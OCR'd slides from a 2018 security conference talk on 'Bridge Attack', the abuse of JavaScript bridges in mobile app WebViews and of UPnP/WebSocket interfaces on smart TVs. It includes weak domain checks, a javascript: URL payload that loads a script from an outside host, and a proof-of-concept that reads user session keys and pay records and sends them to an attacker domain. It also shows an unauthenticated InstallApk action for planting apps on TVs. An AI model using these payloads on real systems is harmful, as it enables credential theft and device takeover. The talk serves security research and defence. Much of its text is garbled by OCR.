Bridge Attack 
—Double-edged Sword in MobileSec 


es Zidong Han 


Self Introduction 


e Mobile Security researcher 
-Tencent Mobile Security Labs Razor Team 


e Focuses on App vulnerability and IOT related security 
e GeekPwn 2018 winner in “Hacker Pwn in House” 


e HITB-SECCONF-2018-Beijing 
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What is Bridge Attack 


Develop Fast Without Risk? 


What is Abstract Bridge 


e Mobile App 
> Android: Javascript in WebView 


> IOS:UIWebView/WKkWebView 


6 lol Device 
> DLNA/Upnp/WebSocket 
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“UnOffical” definition of Bridge Attack 


Why a Bridge Attack 


WebView Attack in Past 


@Using addJavascriptInterface to RCE 
> CVE-2012-6336 


eWebView Cross-domain Risk 
> setAllowFileAccess 
> setAllowFileAccessFromFileURLs 
> setAllowUniversalAccessFromFileURLs 


@URL Scheme Attack 


> <scheme>://<host>:<port>/<path>?<query> with exported 
component 


Difference in Bridge Attack 


e More Attack Surface 
@ Vulnerability effect with Bridge Ability 


e Both Mobile Apps & IoT devicves 


Bridge Attack and Exploit Cases 


Bridge Attack Surface in Mobile Application 


Browser 
Mobile Device 


Bypass Identification Check 


> XSS attack from url 
> InSecure domain check(CSRF) 


> JS Bridge(@JavascriptInterface) Man-in-the-Middle Attack 


Insecure Check Case I 


str.contains( 'safe.com”) 
123safe.com =; str.endsWith("safe.com") 


this.m 
s(); 
boolean t = t(); 
if (NewwebViewUtil.a.a(a, getApplicationContext())) { 
if (!a.contains( m m m com") && !HybridModuleApplication.a.a()) { 
this.a.removeJavascriptinterface("s mm me”); 


} else if (!(NewWebViewUtil.a.b(a) || AccountManager.a.c() || DelayABTest.a.b() != @)) { 
d = a; 
Routers.a(this, Pages.PAGE WELCOME CLEAR STACK); 
finish(); 


Expolit JsBridge Ability 


QJavascriptIntertace 
public void sendClientRequest(@NotNull String str) { 
AjaxEntity ajaxEntity = (AjaxEntity) BridgeUtils.a(str, AjaxEntity.class); 
if (ajaxEntity != null && ajaxEntity.getData() != null) { 
AjaxInfo ajaxInfo = (AjaxInfo) ajaxEntity.getData(); 
final String callback = ajaxEntity.getCallback(); 
if (ajaxInfo.getType() != null) { 
Observable call; 
Map a = BridgeUtils.a(ajaxInfo.getData()); 


> Custom JsApi better or Map hashMap = new HashMap(); 
if (a != null) { 
worse? for (Entry entry : a.entryset()) { 
hashMap.put(entry.getKey(), entry.getValue().toString()); 
1 
J 
: } 
> Easy Web attack Cah csrf IN HttpUrl.Builder a2 = BridgeModel.a(ajaxInfo.getUrl()); 
String type = ajaxInfo.getType(); 
apps Object obj = -1; 


switch (type.hashCode()) { 
case 70454: 
if (type.equals("GET")) 1 
obj = null; 
break; 


} 


break; 
case 79599: 
if (type.equals("PUT")) { 
obj = 2; 
break; 


Insecure Check Case TI 


http://xxx.com/mobile/middle page/index.html? 
url=javascript:alert(document.cookie);//m2.mobike.com 


function callQQ(url, options) { 


env: options && options.env "unknown ' 


utils.getXHR(url, function () { 
if (url.indexof('m2.mobike.com') > -1) 
location . gaJ E (url); 
return true; 


1 
J 


jumpUrl(url); 
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Insecure Check Case TI 


Payload Question: 


> import js file from outer url javascript: s=document.createElement(%22script%22) ; 
s.src=%22http%3A%2F%2Fyaphetsh.com%X2Ftest.js%22; 


Toh ' document.body.appendChild(s); 
> exec any Sensitive JsApi setTimeout(%22testabc()%22,1000); 


> send user sensitive data to malicious url 


Insecure Check Case TI 


new element = document .createElement('script'); 

new element. setattribute('type', 'text/javascript'); 

new element.setattribute('src', 'http://open mobil n/sdk/ .js?_bid=152'); 
document . body. appendChild(new element): 


Import jsapi file 
function testabc() { 


var uin; n = 
mqq.data.getUserInfo(function(responseText) { Call getUserInfo Jsapl 
uin = responseText.uin; 
skey = responseText.skey; 


mqq.data.sendRequest({ 


url: "https:// .com/cgi-bin/clientv1.0/ llet record list.cgi”, 
params: ( . E 
o ipi q sendRequest jsapi to get 


options: { pay info 


method: “POST” 
}, function(responseText) { 


result = JSON.stringify(responseText) ; E 
A À ———— 
window. location.href = encodeURI("http:// etsh.com/attact?name=" + result); Steal user Day info 


}); 
}); 


Attack From A Malicious Url 
SB) “ Complete Exploit Parse Uri — 
ERES 
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Webview Container 


JsBridge Ability 


Native JsAPI 


Payload UrL 
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What Difference in lot Bridge 


> Penetrate LAN from WAN Attack 
-DNS Rebinding 
-Bridge Attack in Brain App 
-Other remote attack entries’ 


> Persistent attack during the exploiting 
-More Broiler can be chosen in a LAN 
-More attack mode can be designed and used 


loTBridge With Cloud Server 


Commaptd Request 


Application 


Cloud Server 


Abstract loT Bridge 
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loTBridge Without Cloud Server 
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Abstract loT Bridge 
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JOT In Private Networks 
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Bridge Attack Surface in IoT Devices 
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Bridge In IOT Device q Jor In Private Networks 
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IoT Bridge Attack Case I 


DLNA Action 


> Expose some Interface with no identify 
checking 


> Basically control media play ability 


> Specially inject backdoor into Tv 


<serviceList> 

<service> 
<serviceType>urn:schemas-upnp-org:service:AVTransport:1</serviceType> 
<serviceld>urn:upnp-org:serviceId:AVTransport</serviceld> 
<SCPDURL>AVTransport.scpd.xml</SCPDURL> 
<controlURL>_urn: schemas -upnp-org:service:AVTransport_control</controlURL> 
<eventSubURL>_urn:schemas-upnp-org:service:AVTransport_event</eventSubURL> 

</service> 

<service> 
<serviceType>urn:schemas-upnp-org: service: ConnectionManager : 1</servicelype> 
<serviceld>urn:upnp-org:serviceId:ConnectionManager</serviceld> 
<SCPDURL>ConnectionManager . scpd, xml</SCPDURL> 
<controlURL> urn:schemas-upnp-org: service: ConnectionManager control</controLURL> 
geventSubURL2 urn:schemas-upnp-org: service: ConnectionManager event</eventSubURL> 

</service> 

<service> 
gserviceTypezurn: schemas -upnp-org:service:RenderingControl:1</servicelype> 
<serviceld>urn:upnp-org:serviceId:RenderingControl</serviceld> 
<SCPDURL>RenderingControl.scpd.xml</SCPDURL> 
<controlURL> urn:schemas-upnp-org:service:RenderingControl control</controlURL> 
<eventSubURL>_urn:schemas-upnp-org:service:RenderingControl_event</eventSubURL> 

</service> 

</serviceList> 


IoT Bridge Attack Case I 


else if (serviceType.equals("urn:schemas-upnp-org:service: AVTransport:1")) { 
if ("GetDeviceCapabilities".equals(action.getName())) { 
action. setArgumentValue("PlayMedia", "NONE, NETWORK, HDD, CD-DA, UNKNOWN") ; 
NR : a action. setArgumentValue("RecMedia", “NOT. IMPLEMENTED"); 
> Sensitive Upnp Action Ma ke Secu rity action. setArgumentValue("RecQualityModes", "NOT IMPLEMENTED"); 
return true; 
} else if ("GetCurrentTransportActions".equals(action.getName())) { 
Worse action. setArgumentValue( “Actions”, “Play, Pause, Stop, Seek, Next, Previous") 
return true; 
} else if (action. getName().equals("SendMessage")) { 
serviceType = action. getArgumentValue("Message"); 
stringBuilder = new StringBuilder(); 
stringBuilder.append("SendMessage = "); 
> Remote Download->Install App-> stringBuilder. append serviceType) 
c.c("MediaRendererDevice", stringBuilder.toString()); 
alserviceType, action): 
Launch App retum true; 
} else if (action.getName().equals("InstallApk")) { 
serviceType = action. getArgumentValue("filename"); 
r8 = action. getërgumentValue( 'filecontent”),: 
stringBuilder = new StringBuilderi): 
>A k E E © k stringBuilder.append(">>>>>InstallApk "); 
ttac er ntering private networ stringBuilder.append(serviceType); 
c.c("MediaRendererDevice", stringBuilder.toString()); 
Intent intent = new Intent(); 
intent.setAction("InstallApk"); 
intent. putExtra("filename", serviceType) ; 
intent. putExtra("“filecontent", r8); 
a(intent) ; 
return true; 


IoT Bridge Attack Case II 


WebSocket 
v Line-based text data (1 lines) 
[truncated]{"appId":"9000015369155", "appName":"\3 


> Center App with no Code Protection 
> Communicate with Tv with no Identify check 
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> Remote attack Smart Tv imitate Center App Action 


ttv.com/ 
Applicat 
re/15287 
19996. pn 
ownloadU 
p://api2 
tema r 
appstore 
appDownl 
n=&appId 
169155&t 
sion=61. 
tversion 
apkUrl=h 


Defense the Bridge Attack 


e For Jsbridge: 
> Check identification seriously 


> Constraint the permission of bridge ability 


> Ensure the communication security with encryto channel(etc. 
https) 


e For IoTbridge: 
> Same security policy with JsBridge 


> Be cautious in expanding and abusing the bridge ability 


> Make sure your command action with authentication tickets 


Conclusion 


@ More Target: Mobile Apps and loT devices 
O Attack Surface: Integrate Web attacks with App/loT attacks 


0 Easy-to-use:By only a malicious url, even spread quickly 
and widely 


O Expolit Ability: RCE/LCE, Sensitive Information Leak, APT 


Thanks 


